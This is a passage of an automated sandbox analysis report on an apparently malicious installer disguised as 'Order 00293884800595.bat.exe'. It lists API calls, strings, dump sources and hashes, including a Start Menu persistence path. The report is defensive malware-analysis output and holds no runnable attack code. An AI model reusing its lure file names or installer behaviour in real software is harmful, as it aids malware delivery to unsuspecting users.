                                                    • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call$G8g
                                                  • API String ID: 2624150263-1033649006
                                                  • Opcode ID: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                                  • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                                  • Opcode Fuzzy Hash: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
                                                  • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                                  APIs
                                                  • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne, xrefs: 0040225D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne
                                                  • API String ID: 123533781-171433923
                                                  • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                                  • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                                                  • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                                  • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                                  • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                                                  • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                                  • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                                  • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                                                  • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                                  • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                                  • Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
                                                  • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                                  • Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                                  • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                                  • DeleteObject.GDI32(00000110), ref: 00404E33
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                                    • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                                  • ShowWindow.USER32(?,00000005), ref: 00404F94
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                                  • GlobalFree.KERNEL32(?), ref: 00405172
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                                  • ShowWindow.USER32(?,00000000), ref: 0040531C
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                                  • ShowWindow.USER32(00000000), ref: 0040532E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $G8g$M$N
                                                  • API String ID: 2564846305-1825387520
                                                  • Opcode ID: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                                  • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                                  • Opcode Fuzzy Hash: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                                  • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                                  • GetSysColor.USER32(?), ref: 00404566
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                                  • lstrlenA.KERNEL32(?), ref: 00404587
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                                  • SendMessageA.USER32(00000000), ref: 00404610
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                                  • SetCursor.USER32(00000000), ref: 00404693
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                                  • SetCursor.USER32(00000000), ref: 004046AC
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$G8g$N$cD@
                                                  • API String ID: 3103080414-1343905038
                                                  • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                                  • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                                  • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                                  • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,humpende Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F$humpende Setup
                                                  • API String ID: 941294808-3363781941
                                                  • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                                  • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                                  • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                                  • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                                  • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                                    • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                                    • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                                  • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                                  • wsprintfA.USER32 ref: 00405F6B
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                                  • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406054
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                                    • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                                    • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                                  • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                                  • Opcode Fuzzy Hash: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                                  • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                                  APIs
                                                  • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                                  • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                                  • CharNextA.USER32(0000000C,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                                  • CharPrevA.USER32(0000000C,0000000C,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                                  • *?|<>/":, xrefs: 004065CF
                                                  • "C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00406587
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-3721164416
                                                  • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                                  • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                                  • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                                  • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                                  • GetSysColor.USER32(00000000), ref: 004043EF
                                                  • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                                  • SetBkMode.GDI32(?,?), ref: 00404407
                                                  • GetSysColor.USER32(?), ref: 0040441A
                                                  • SetBkColor.GDI32(?,?), ref: 0040442A
                                                  • DeleteObject.GDI32(?), ref: 00404444
                                                  • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
